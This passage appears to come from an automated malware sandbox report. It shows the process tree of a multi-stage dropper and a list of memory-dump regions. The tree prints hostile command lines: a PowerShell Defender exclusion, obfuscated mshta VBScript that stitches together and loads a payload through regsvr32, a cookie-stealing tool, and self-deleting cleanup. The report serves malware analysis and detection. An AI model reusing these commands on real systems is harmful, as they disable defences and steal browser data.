                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4qucaizx.mk2\google-game.exe & exit
                                                                                                                  9⤵
                                                                                                                    PID:3060
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4qucaizx.mk2\google-game.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4qucaizx.mk2\google-game.exe
                                                                                                                      10⤵
                                                                                                                        PID:2744
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ino441dw.pmk\GcleanerWW.exe /mixone & exit
                                                                                                                      9⤵
                                                                                                                        PID:1864
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x5wyxkx5.e3s\005.exe & exit
                                                                                                                        9⤵
                                                                                                                          PID:2864
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\x5wyxkx5.e3s\005.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\x5wyxkx5.e3s\005.exe
                                                                                                                            10⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                            PID:2112
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rtvabxtl.5tr\toolspab1.exe & exit
                                                                                                                          9⤵
                                                                                                                            PID:328
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\rtvabxtl.5tr\toolspab1.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\rtvabxtl.5tr\toolspab1.exe
                                                                                                                              10⤵
                                                                                                                                PID:2656
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\rtvabxtl.5tr\toolspab1.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\rtvabxtl.5tr\toolspab1.exe
                                                                                                                                  11⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:2636
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tgte2515.mfo\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                              9⤵
                                                                                                                                PID:3944
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tgte2515.mfo\installer.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\tgte2515.mfo\installer.exe /qn CAMPAIGN="654"
                                                                                                                                  10⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                  PID:4084
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ccql5ib.kfm\702564a0.exe & exit
                                                                                                                                9⤵
                                                                                                                                  PID:2004
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1ccql5ib.kfm\702564a0.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1ccql5ib.kfm\702564a0.exe
                                                                                                                                    10⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                    PID:2780
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c metina_3.exe
                                                                                                                        4⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:240
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_3.exe
                                                                                                                          metina_3.exe
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:1796
                                                                                                                          • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                            "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",get
                                                                                                                            6⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:520
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c metina_2.exe
                                                                                                                        4⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:1616
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_2.exe
                                                                                                                          metina_2.exe
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:1268
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c metina_9.exe
                                                                                                                        4⤵
                                                                                                                          PID:1716
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c metina_8.exe
                                                                                                                          4⤵
                                                                                                                            PID:1152
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c metina_7.exe
                                                                                                                            4⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:684
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_7.exe
                                                                                                                              metina_7.exe
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Modifies system certificate store
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:668
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C powershell Add-MpPreference -ExclusionExtension .exe -Force
                                                                                                                                6⤵
                                                                                                                                  PID:1316
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell Add-MpPreference -ExclusionExtension .exe -Force
                                                                                                                                    7⤵
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1804
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Roaming\1RP0ICI7OWGTJSL2AEYYGO4X.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:2664
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1RP0ICI7OWGTJSL2AEYYGO4X.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1RP0ICI7OWGTJSL2AEYYGO4X.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:2744
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1RP0ICI7OWGTJSL2AEYYGO4X.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\1RP0ICI7OWGTJSL2AEYYGO4X.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:2388
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Roaming\16IW0TIQSLEFXBRZF762F7JB.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2676
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\16IW0TIQSLEFXBRZF762F7JB.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\16IW0TIQSLEFXBRZF762F7JB.exe"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:2728
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\75855802710.exe"
                                                                                                                                        8⤵
                                                                                                                                          PID:2904
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\75855802710.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\75855802710.exe"
                                                                                                                                            9⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:2960
                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              "C:\Windows\System32\mshta.exe" vbscrIpT: CLOSe ( CReatEobJEct ( "wSCRIpt.sHelL" ). RUN ( "C:\Windows\system32\cmd.exe /q /c cOpy /Y ""C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\75855802710.exe"" ..\FvGWPoD.eXE && stART ..\FvGWpoD.eXE /pFqr39jpBa6GEV & if """" == """" for %x iN ( ""C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\75855802710.exe"" ) do taskkill /F -im ""%~NXx"" ",0 , tRuE) )
                                                                                                                                              10⤵
                                                                                                                                                PID:2984
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /q /c cOpy /Y "C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\75855802710.exe" ..\FvGWPoD.eXE && stART ..\FvGWpoD.eXE /pFqr39jpBa6GEV& if "" == "" for %x iN ( "C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\75855802710.exe" ) do taskkill /F -im "%~NXx"
                                                                                                                                                  11⤵
                                                                                                                                                    PID:3068
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FvGWPoD.eXE
                                                                                                                                                      ..\FvGWpoD.eXE /pFqr39jpBa6GEV
                                                                                                                                                      12⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2124
                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbscrIpT: CLOSe ( CReatEobJEct ( "wSCRIpt.sHelL" ). RUN ( "C:\Windows\system32\cmd.exe /q /c cOpy /Y ""C:\Users\Admin\AppData\Local\Temp\FvGWPoD.eXE"" ..\FvGWPoD.eXE && stART ..\FvGWpoD.eXE /pFqr39jpBa6GEV & if ""/pFqr39jpBa6GEV"" == """" for %x iN ( ""C:\Users\Admin\AppData\Local\Temp\FvGWPoD.eXE"" ) do taskkill /F -im ""%~NXx"" ",0 , tRuE) )
                                                                                                                                                        13⤵
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        PID:948
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /q /c cOpy /Y "C:\Users\Admin\AppData\Local\Temp\FvGWPoD.eXE" ..\FvGWPoD.eXE && stART ..\FvGWpoD.eXE /pFqr39jpBa6GEV& if "/pFqr39jpBa6GEV" == "" for %x iN ( "C:\Users\Admin\AppData\Local\Temp\FvGWPoD.eXE" ) do taskkill /F -im "%~NXx"
                                                                                                                                                          14⤵
                                                                                                                                                            PID:1508
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBsCRipt:ClOsE ( cREATEobjeCt ("WSCRiPT.SHELl"). RUN ( "cmD /c Echo | Set /P = ""MZ"" > 8TlOl.O & COPY /B /y 8TLOL.O + dIRG.4U + uXEvcrI.wY + DWEDK.8M ..\AuAgDVM~.PSs & stARt regsvr32.exe /S ..\AUAGDVm~.pss & deL /q * " , 0, tRUe ) )
                                                                                                                                                          13⤵
                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                          PID:1880
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c Echo | Set /P = "MZ" > 8TlOl.O & COPY /B /y 8TLOL.O + dIRG.4U + uXEvcrI.wY + DWEDK.8M ..\AuAgDVM~.PSs & stARt regsvr32.exe /S ..\AUAGDVm~.pss &deL /q *
                                                                                                                                                            14⤵
                                                                                                                                                              PID:1964
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:1208
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>8TlOl.O"
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:2380
                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                    regsvr32.exe /S ..\AUAGDVm~.pss
                                                                                                                                                                    15⤵
                                                                                                                                                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                    PID:1612
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /F -im "75855802710.exe"
                                                                                                                                                              12⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:2152
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\73921824778.exe" /mix
                                                                                                                                                      8⤵
                                                                                                                                                        PID:2172
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\73921824778.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\73921824778.exe" /mix
                                                                                                                                                          9⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:2308
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\40113216057.exe" /mix
                                                                                                                                                        8⤵
                                                                                                                                                          PID:2964
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\40113216057.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\{mbu7-5RO90-Yg51-7J3GW}\40113216057.exe" /mix
                                                                                                                                                            9⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                            PID:2120
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
                                                                                                                                                              edspolishpp.exe
                                                                                                                                                              10⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:1392
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "16IW0TIQSLEFXBRZF762F7JB.exe" /f & erase "C:\Users\Admin\AppData\Roaming\16IW0TIQSLEFXBRZF762F7JB.exe" & exit
                                                                                                                                                          8⤵
                                                                                                                                                            PID:2268
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "metina_7.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_7.exe" & exit
                                                                                                                                                        6⤵
                                                                                                                                                          PID:2128
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /im "metina_7.exe" /f
                                                                                                                                                            7⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:2704
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c metina_6.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:1516
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_6.exe
                                                                                                                                                        metina_6.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:1624
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1391070.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1391070.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:2060
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4208679.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4208679.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                          PID:2140
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:2396
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4827073.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4827073.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:2232
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c metina_5.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:1892
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4E798D94\metina_5.exe
                                                                                                                                                        metina_5.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                        PID:768
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:1360
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:2504
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c metina_10.exe
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1352
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /im "16IW0TIQSLEFXBRZF762F7JB.exe" /f
                                                                                                                                                  1⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:3052
                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-1632246983-14727790341515646139-1835263519-533451110-1469922143559829955661088938"
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                  PID:1608
                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "5780072-144657990-159173224914696760932128099530-3703907691000670122-1945637817"
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                  PID:2656
                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-290964947-9104894811529806015-95377083014733671011299588368351656695-1104100608"
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:436
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BC5D.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\BC5D.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2596

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • memory/268-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    1.5MB

                                                                                                                                                  • memory/268-93-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    100KB

                                                                                                                                                  • memory/268-98-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    1.5MB

                                                                                                                                                  • memory/268-97-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    572KB

                                                                                                                                                  • memory/268-96-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    100KB

                                                                                                                                                  • memory/268-95-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    100KB

                                                                                                                                                  • memory/268-94-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    100KB

                                                                                                                                                  • memory/268-92-0x0000000000400000-0x000000000051D000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    1.1MB

                                                                                                                                                  • memory/268-89-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    572KB

                                                                                                                                                  • memory/268-91-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    152KB

                                                                                                                                                  • memory/268-100-0x0000000000400000-0x000000000051D000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    1.1MB

                                                                                                                                                  • memory/268-99-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    152KB

                                                                                                                                                  • memory/520-187-0x0000000001EE0000-0x0000000001F3C000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    368KB

                                                                                                                                                  • memory/520-185-0x0000000001F80000-0x0000000002081000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    1.0MB

                                                                                                                                                  • memory/588-190-0x0000000000460000-0x00000000004D0000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/632-158-0x0000000000400000-0x000000000041D000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    116KB

                                                                                                                                                  • memory/668-224-0x0000000004D20000-0x0000000004D21000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/668-192-0x00000000009D0000-0x00000000009D1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/860-191-0x0000000001800000-0x0000000001870000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/860-188-0x0000000000BA0000-0x0000000000BEB000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    300KB

                                                                                                                                                  • memory/920-308-0x0000000000A20000-0x0000000000A21000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/920-310-0x0000000000A40000-0x0000000000A41000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/920-314-0x00000000038B0000-0x00000000038B1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/920-311-0x0000000000A50000-0x0000000000A51000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/920-307-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/920-315-0x00000000038C0000-0x00000000038C1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/920-309-0x0000000000A30000-0x0000000000A31000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/920-312-0x0000000003890000-0x0000000003891000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/920-313-0x00000000038A0000-0x00000000038A1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1228-229-0x00000000038C0000-0x00000000038D6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    88KB

                                                                                                                                                  • memory/1268-194-0x0000000000230000-0x000000000027F000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    316KB

                                                                                                                                                  • memory/1268-195-0x0000000000400000-0x000000000044F000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    316KB

                                                                                                                                                  • memory/1356-183-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1604-279-0x0000000001E00000-0x0000000001E02000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/1608-301-0x00000000003F0000-0x0000000000400000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    64KB

                                                                                                                                                  • memory/1608-302-0x0000000000440000-0x0000000000452000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    72KB

                                                                                                                                                  • memory/1612-283-0x0000000010000000-0x0000000010191000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    1.6MB

                                                                                                                                                  • memory/1612-282-0x0000000000180000-0x0000000000181000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1624-154-0x000000001B1F0000-0x000000001B1F2000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/1624-152-0x0000000000150000-0x000000000016B000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    108KB

                                                                                                                                                  • memory/1624-150-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1668-60-0x0000000075B31000-0x0000000075B33000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/1804-208-0x0000000004A90000-0x0000000004A91000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1804-253-0x000000007EF30000-0x000000007EF31000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1804-209-0x0000000004A92000-0x0000000004A93000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1804-203-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1804-238-0x0000000004A70000-0x0000000004A71000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1804-210-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1804-225-0x0000000002630000-0x0000000002631000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1896-305-0x0000000000420000-0x0000000000421000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1960-306-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    80KB

                                                                                                                                                  • memory/2060-218-0x0000000000D50000-0x0000000000D51000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2060-205-0x0000000000380000-0x0000000000381000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2060-216-0x00000000005A0000-0x00000000005C9000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    164KB

                                                                                                                                                  • memory/2104-219-0x0000000000B20000-0x0000000000B22000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/2120-303-0x0000000000240000-0x0000000000315000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    852KB

                                                                                                                                                  • memory/2120-304-0x0000000000400000-0x00000000004D5000-memory.dmp

